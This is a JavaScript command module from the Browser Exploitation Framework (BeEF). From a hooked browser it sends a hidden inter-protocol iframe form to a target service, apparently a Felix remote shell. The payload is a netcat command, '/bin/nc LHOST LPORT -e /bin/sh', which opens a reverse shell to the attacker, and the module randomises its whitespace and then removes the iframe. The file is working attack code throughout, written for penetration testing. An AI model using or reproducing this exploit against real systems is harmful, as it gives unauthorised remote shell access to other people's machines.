1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8
  var rhost = '<%= @rhost %>'; 
9
  var rport = '<%= @rport %>';
10
  var lhost = '<%= @lhost %>';
11
  var lport = '<%= @lport %>';
12
  var payload_name = 'reverse_netcat';
13
  var timeout = 15;
14
  var peer = rhost + ':' + rport;
15

16
  cleanup = function() {
17
    try {
18
      document.body.removeChild(felix_exec_iframe_<%= @command_id %>);
19
    } catch(e) {
20
      beef.debug("Could not remove iframe: " + e.message);
21
    }
22
  }
23
  setTimeout("cleanup()", timeout*1000);
24

25
  payload = function() {
26
    var whitespace = '';
27
    for (var i=0; i<Math.floor(Math.random()*10)+3; i++) whitespace += ' ';
28
    var payload = '';
29
    switch (payload_name) {
30
      default: // "reverse_netcat":
31
        payload = 'exec "/bin/nc ' + lhost + ' ' + lport + ' -e /bin/sh" ';
32
        payload = payload.replace(/ /g, whitespace);
33
        break;
34
    }
35
    return payload
36
  }
37

38
  exploit = function() {
39
    var code = payload();
40
    beef.debug(peer + " - Sending payload (" + code.length + " bytes)");
41
    var felix_exec_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/", code);
42
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
43
  }
44

45
  try {
46
    exploit();
47
  } catch(e) {
48
    beef.debug(peer + " - Exploit failed: " + e.message);
49
  }
50

51
});
52

53